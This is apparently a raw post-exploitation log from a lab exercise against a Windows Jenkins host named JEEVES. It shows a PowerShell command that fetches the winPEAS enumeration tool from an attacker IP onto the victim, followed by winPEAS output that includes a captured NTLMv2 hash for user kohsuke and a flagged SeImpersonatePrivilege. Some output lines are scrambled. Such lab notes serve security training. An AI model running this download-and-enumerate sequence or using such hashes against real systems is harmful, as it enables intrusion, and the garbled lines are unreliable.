PEAS
c:\Users\Administrator\.jenkins\tmp> cmd /c powershell -c "iwr -Uri http://10.10.16.8/winPEASany.exe -Outfile C:\Users\Administrator\.jenkins\tmp\winPEASany.exe"Delivery complete Executing PEAS
CVEs
ENV
���������� User Environment Variables
� Check for some passwords or keys in the env variables
computername: JEEVES
public: C:\Users\Public
localappdata: C:\Users\kohsuke\AppData\Local
psmodulepath: %ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
processor_architecture: AMD64
path: C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
commonprogramfiles(x86): C:\Program Files (x86)\Common Files
programfiles(x86): C:\Program Files (x86)
processor_level: 6
programfiles: C:\Program Files
userprofile: C:\Users\kohsuke
systemroot: C:\Windows
os: Windows_NT
c:\ProgramDataOFILE:
programdata: C:\ProgramData
processor_revision: 5507
username: kohsuke
commonprogramw6432: C:\Program Files\Common Files
commonprogramfiles: C:\Program Files\Common Files
onedrive: C:\Users\kohsuke\OneDrive
winsw_executable: C:\Users\Administrator\.jenkins\jenkins.exe
jenkins_home: C:\Users\Administrator\.jenkins
pathext: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
processor_identifier: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
comspec: C:\Windows\system32\cmd.exe
service_id: jenkins
prompt: $P$G
systemdrive: C:
temp: C:\Users\kohsuke\AppData\Local\Temp
winsw_service_id: jenkins
number_of_processors: 1
appdata: C:\Users\kohsuke\AppData\Roaming
tmp: C:\Users\kohsuke\AppData\Local\Temp
programw6432: C:\Program Files
windir: C:\Windows
userdomain: JEEVES
base: C:\Users\Administrator\.jenkins
���������� System Environment Variables
nv variables ome passwords or keys in the e
comspec: C:\Windows\system32\cmd.exe
os: Windows_NT
path: C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
pathext: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
processor_architecture: AMD64
psmodulepath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
temp: C:\Windows\TEMP
tmp: C:\Windows\TEMP
username: SYSTEM
windir: C:\Windows
number_of_processors: 1
processor_level: 6
processor_identifier: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
processor_revision: 5507LAPS
LSA Protection
Credentials Guard
Cached Creds
UAC
PowerShell
5.0.10586.672
NTLM
kohsuke::JEEVES:1122334455667788:a45ac2b615ebe3f4ace9153e1575e0eb:010100000000000061e2e7128a24da013d527765f2f45e370000000008003000300000000000000000000000003000008a53d0e3a444db6b709f496ae7b7c1ab0f66f58f4487df900f61ac17ee1037fd0a00100000000000000000000000000000000000090000000000000000000000
Printers
���������� Enumerating Printers (WMI)
name: Microsoft XPS Document Writer
status: Unknown
sddl: O:SYD:(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
=================================================================================================
name: Microsoft Print to PDF
status: Unknown
sddl: O:SYD:(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
=================================================================================================
name: HPF75421 (HP ENVY 4500 series)
status: Degraded
sddl: O:SYD:(A;;LCSWSDRCWDWO;;;S-1-5-21-2851396806-8246019-2289784878-1000)(A;OIIO;RPWPSDRCWDWO;;;S-1-5-21-2851396806-8246019-2289784878-1000)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: True
is network printer: False
=================================================================================================
name: Fax
status: Unknown
sddl: O:SYD:(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
=================================================================================================For the spoolsv.exe process
.NET
Privileges (kohsuke)
SeImpersonatePrivilege
Ever Logged Users
AutoLogon
Services
Installed Programs
Drivers
���������� Device Drivers --Non Microsoft--
� Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#vulnerable-drivers
NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvraid.sys
Broadcom NetXtreme II GigE - 7.4.14.0 [Broadcom Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxvbda.sys
VMware vSockets Service - 9.8.8.0 build-4037350 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys
QLogic 10 GigE - 7.12.2.3 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\evbda.sys
VMware PCI VMCI Bus Device - 9.8.6.0 build-3966680 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmci.sys
Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorV.sys
LSI 3ware RAID Controller - WindowsBlue [LSI]: \\.\GLOBALROOT\SystemRoot\System32\drivers\3ware.sys
AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsata.sys
Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdxata.sys
rivers\amdsbs.sysy AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies Inc.]: \\.\GLOBALROOT\SystemRoot\System32\d
Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\arcsas.sys
Intel(R) Rapid Storage Technology driver (inbox) - 13.2.0.1022 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorAV.sys
LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas.sys
Microsoftr Windowsr Operating System - 10.0.10048.0 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas2i.sys
Microsoftr Windowsr Operating System - 10.0.10048.0 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas3i.sys
LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sss.sys
MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas.sys
MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasr.sys
m Marvell Flash Controller - 1.0.5.1016 [Marvell Semiconductor, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\mvumis.sys
NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvstor.sys
MEGASAS RAID Controller Driver for Windows - 6.803.21.00 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas2i.sys
MEGASAS RAID Controller Driver for Windows - 6.602.12.0 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys
Microsoftr Windowsr Operating System - 2.60.01 [Silicon Integrated Systems Corp.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SiSRaid2.sys
Microsoftr Windowsr Operating System - 6.1.6918.0 [Silicon Integrated Systems]: \\.\GLOBALROOT\SystemRoot\System32\drivers\sisraid4.sys
VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vsmraid.sys
Promiser SuperTrak EX Series - 5.1.0000.10 [Promise Technology, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\stexstor.sys
VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vstxraid.sys
PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ADP80XX.SYS
SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver (x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\HpSAMD.sys
VMware PVSCSI StorPort driver (64-bit) - 1.3.8.0 build-3482537 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\pvscsi.sys
VMware Pointing USB Device Driver - 12.5.7.0 build-3574480 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmusbmouse.sys
VMware Raw Disk Helper Driver - 1.1.0.0 build-3625720 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmrawdsk.sys
VMware Pointing PS/2 Device Driver - 12.5.7.0 build-3574480 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys
VMware SVGA 3D - 8.15.01.0051 - build-5479029 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp.sys
Intel(R) Gigabit Adapter - 12.12.50.6 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\e1i63x64.sys
VMware server memory controller - 7.4.2.0 build-5980934 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sysSMB
Networks
